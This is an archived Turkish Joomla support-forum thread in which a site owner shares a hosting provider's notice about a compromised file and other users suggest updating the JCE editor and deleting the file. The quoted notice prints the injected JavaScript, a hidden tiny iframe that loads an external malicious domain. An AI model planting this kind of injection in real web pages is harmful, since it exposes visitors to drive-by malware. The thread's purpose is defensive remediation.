PDA

Orijinalini görmek için tıklayınız : ÇÖZÜLDÜ Malicious Files Detected



Ali KOCA
18-07-2013, 10:10
e.a.
Arkadaşlar kolay gelsin. Benim hosting firması şöyle bir mail atmış:

Dear customer,
This notice is to inform you that we have detected malicious code in your website files. We have compiled a list of compromised files on your account, as well as the code injected, below.
In order to maintain a secure hosting environment, we will be automatically correcting these compromised files on your account; however, please be aware that you are responsible for verifying that the content hosted within your account is secure. We strongly advise that you update your installed scripts and software, as outdated scripts and software are the most frequently used method for accessing and gaining control of a targeted account.
The compromised files detected are:
/home2/..../components/com_wrapper/yy3abt.php
The malicious code detected is similar to:
Redirects to the following example URL:
document.write('<iframe src="http://activexscrutiny.org/Lexmark?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');
While we are able to detect and clean these compromises, this does not secure against further hacking attempts through the same method. This particular exploit appears to be related to outdated versions of Joomla's JCE Editor. We highly suggest updating all instances of Joomla on your account with the latest version of JCE editor, found here:
JCE - Joomla! Extensions Directory (http://extensions.joomla.org/extensions/edition/editors/88)

Elimdeki yedekleri inceledim, böyle bir dosya yok. Bu nasıl bulaşmış olabilir. Joomla nın bir açığı mıdır, yoksa hosting firmasının zaafı mıdır?
Selametle...

AcoustiC
18-07-2013, 10:41
Jce editörün eski sürümünden olduğunu belirtmişler zaten 3 gün önce yeni sürüm güncellemesi yaptılar yeni sürüme günclleyiniz. Sizde acil olarak belirtilen yoldaki dosyaya ulaşarak o dosyaıyı silip izinleri 755 olarak değiştirmenizi tavsiye ederim.

Ali KOCA
18-07-2013, 11:22
Jce editörün eski sürümünden olduğunu belirtmişler zaten 3 gün önce yeni sürüm güncellemesi yaptılar yeni sürüme günclleyiniz. Sizde acil olarak belirtilen yoldaki dosyaya ulaşarak o dosyaıyı silip izinleri 755 olarak değiştirmenizi tavsiye ederim.
İlginize çok teşekkür ediyorum.
Bu dosyayı oluşturan editör eklentisinin açığı mıdır? Benim asıl merak ettiğim bu?
Selamlar...

AcoustiC
18-07-2013, 15:16
İlginize çok teşekkür ediyorum.
Bu dosyayı oluşturan editör eklentisinin açığı mıdır? Benim asıl merak ettiğim bu?
Selamlar...

Evet hosting sağlayıcınız bu bileşenin dosyalarında açık olduğunu belirtiyor ben de bu yazıyı okuduktsan sonra kişisel web sitemde kullandığım jce bileşeni kaldırdım ayrıyetn pluginini de kaldırdım. Tavsiyem son sürüme yükseltme yapmanızdır.

Ali KOCA
18-07-2013, 15:26
Evet hosting sağlayıcınız bu bileşenin dosyalarında açık olduğunu belirtiyor ben de bu yazıyı okuduktsan sonra kişisel web sitemde kullandığım jce bileşeni kaldırdım ayrıyetn pluginini de kaldırdım. Tavsiyem son sürüme yükseltme yapmanızdır.
İlginize teşekkür ediyorum.
Selamlar.

AcoustiC
18-07-2013, 15:43
İlginize teşekkür ediyorum.
Selamlar.

Ben teşekkür ederim iyi günler ve iyi çalışmalar dilerim.

Ali KOCA
18-07-2013, 15:52
İşin garip tarafı şimdi bakıyorum sitede bu bileşen kurulu değilmiş.
Zaten firmanın gönderdiği dosyanın yolu da ..../components/com_wrapper/ bu hangi bileşendir.

AcoustiC
18-07-2013, 16:09
İşin garip tarafı şimdi bakıyorum sitede bu bileşen kurulu değilmiş.
Zaten firmanın gönderdiği dosyanın yolu da ..../components/com_wrapper/ bu hangi bileşendir.
com_wrapper Sarıcı yani iframe sarıcı adı ile anılan bileşendir.
Sitenizin içerisinde bir başka siteye ait sayfayı göstermek için kullanılır.
siteniz ftp dizinin de
/home2/..../components/com_wrapper/yy3abt.php bu adresi kontrol ederek dosyayı kaldırınız.